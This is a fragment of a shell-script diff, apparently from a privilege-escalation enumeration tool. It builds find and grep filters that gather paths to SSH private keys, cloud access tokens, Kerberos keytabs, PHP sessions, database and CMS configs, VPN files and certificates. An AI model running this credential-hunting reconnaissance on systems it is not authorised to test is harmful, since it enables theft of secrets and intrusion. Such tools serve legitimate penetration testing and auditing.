$FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` - FIND_APPLICATIONS=`eval_bckgrd "find /Applications/ $SNMP_RELEVANT_NAMES -o $FIND_FASTCGI_RELEVANT_NAMES -o $FIND_MOODLE_RELEVANT_NAMES -o $FIND_DOCKER_RELEVANT_NAMES -o $FIND_VIM_RELEVANT_NAMES -o $FIND_GITLAB_RELEVANT_NAMES -o $FIND_PASSWD_SPLUNK_RELEVANT_NAMES -o $FIND_BACKUPMANAGER_RELEVANT_NAMES -o $FIND_KEYRING_RELEVANT_NAMES -o $FIND_POSTGRESQL_RELEVANT_NAMES -o $FIND_APACHE_RELEVANT_NAMES -o $FIND_PHP_RELEVANT_NAMES -o $FIND_WORDPRESS_RELEVANT_NAMES -o $FIND_DRUPAL_RELEVANT_NAMES -o $FIND_TOMCAT_RELEVANT_NAMES -o $FIND_MONGO_RELEVANT_NAMES -o $FIND_SUPERVISORD_RELEVANT_NAMES -o $FIND_CESI_RELEVANT_NAMES -o $FIND_RSYNCD_RELEVANT_NAMES -o $FIND_HOSTAPAD_RELEVANT_NAMES -o $FIND_ANACONDA_KS_RELEVANT_NAMES -o $FIND_OVPN_RELEVANT_NAMES -o $FIND_SSH_RELEVANT_NAMES -o $FIND_CLOUD_KEYS_RELEVANT_NAMES -o $FIND_KIBANA_RELEVANT_NAMES -o $FIND_ELASTICSEARCH_RELEVANT_NAMES -o $FIND_REDIS_RELEVANT_NAMES -o $FIND_MOSQUITTO_RELEVANT_NAMES -o $FIND_DB_RELEVANT_NAMES -o $FIND_INSTERESTING_RELEVANT_NAMES -o $FIND_ERLANG_RELEVANT_NAMES -o $FIND_GVM_RELEVANT_NAMES -o $FIND_IPSEC_RELEVANT_NAMES 2>/dev/null | sort; printf \\\$Y'. '\\\$NC 1>&2;"` wait # Always wait at the end CONT_THREADS=0 #Reset the threads counter + #GENERATE THE STORAGES OF THE FOUND FILES + PSTORAGE_SYSTEMD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.service$" | sort | uniq | head -n 70) + PSTORAGE_TIMER=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.timer$" | sort | uniq | head -n 70) + PSTORAGE_SOCKET=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/lib64|^/.cache|^/bin|^/var|^/etc|^/mnt|^/private|^/usr|^/cdrom|^/opt|^/system|^/snap|^/lib32|^/lib|^/srv|^/run|^/applications|^/tmp|^/sys|^/media|^/systemd|^/sbin|^$GREPHOMESEARCH" | grep -E ".*\.socket$" | sort | uniq | head -n 70) + PSTORAGE_DBUS=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) + PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mysql$" | sort | uniq | head -n 70) + PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) + PSTORAGE_APACHE=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "sites-enabled$|000-default$" | sort | uniq | head -n 70) + PSTORAGE_PHPCOOKIES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/tmp|^/var|^/mnt" | grep -E "sess_.*$" | sort | uniq | head -n 70) + PSTORAGE_PHP_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_WORDPRESS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) + PSTORAGE_DRUPAL=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E '/default/settings.php' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "settings\.php$" | sort | uniq | head -n 70) + PSTORAGE_MOODLE=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E 'moodle/config.php' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "config\.php$" | sort | uniq | head -n 70) + PSTORAGE_TOMCAT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "tomcat-users\.xml$" | sort | uniq | head -n 70) + PSTORAGE_MONGO=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "mongod.*\.conf$" | sort | uniq | head -n 70) + PSTORAGE_SUPERVISORD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "supervisord\.conf$" | sort | uniq | head -n 70) + PSTORAGE_CESI=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "cesi\.conf$" | sort | uniq | head -n 70) + PSTORAGE_RSYNC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "rsyncd\.conf$|rsyncd\.secrets$" | sort | uniq | head -n 70) + PSTORAGE_HOSTAPD=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "hostapd\.conf$" | sort | uniq | head -n 70) + PSTORAGE_ANACONDA_KS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70) + PSTORAGE_VNC=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" | sort | uniq | head -n 70) + PSTORAGE_LDAP=$(echo -e "$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "ldap$" | sort | uniq | head -n 70) + PSTORAGE_OPEN_VPN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.ovpn$" | sort | uniq | head -n 70) + PSTORAGE_SSH_FILES=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$" | sort | uniq | head -n 70) + PSTORAGE_CERTSB4=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70) + PSTORAGE_CERTSBIN=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70) + PSTORAGE_CERTSCLIENT=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -v -E '^/usr/share/|^/etc/ssl/|^/usr/local/lib/|^/usr/lib/.*' | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70) + PSTORAGE_SSH_AGENTS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/tmp" | grep -E "agent.*$" | sort | uniq | head -n 70) + PSTORAGE_SSH_CONFIG=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^$GREPHOMESEARCH|^/usr" | grep -E "ssh.*config$" | sort | uniq | head -n 70) + PSTORAGE_CLOUD_CREDENTIALS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM\n$FIND_DIR_BIN\n$FIND_DIR_CACHE\n$FIND_DIR_SRV\n$FIND_DIR_PRIVATE\n$FIND_DIR_MNT\n$FIND_DIR_TMP\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_VAR\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MEDIA\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_USR\n$FIND_DIR_SBIN\n$FIND_DIR_CDROM\n$FIND_DIR_SNAP" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|\.bluemix$" | sort | uniq | head -n 70) + PSTORAGE_KERBEROS=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E "^/applications|^/.cache|^/private|^/usr|^/tmp|^/bin|^/cdrom|^/var|^/opt|^/media|^/etc|^/sbin|^/srv|^/mnt|^$GREPHOMESEARCH|^/snap" | grep -E "krb5\.conf$|krb5\.keytab$|\.k5login$|kadm5\.acl$" | sort | uniq | head -n 70) + PSTORAGE_KIBANA=$(echo -e "$FIND_SRV\n$FIND_SYSTEM\n$FIND_LIB\n$FIND_SYS\n$FIND_BIN\n$FIND_ETC\n$FIND_RUN\n$FIND_VAR\n$FIND_APPLICATIONS\n$FIND_PRIVATE\n$FIND_LIB32\n$FIND_USR\n$FIND_OPT\n$FIND_MEDIA\n$FIND_LIB64\n$FIND_SNAP\n$FIND_SYSTEMD\n$FIND_SBIN\n$FIND_TMP\n$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_MNT\n$FIND_CDROM" | grep -E 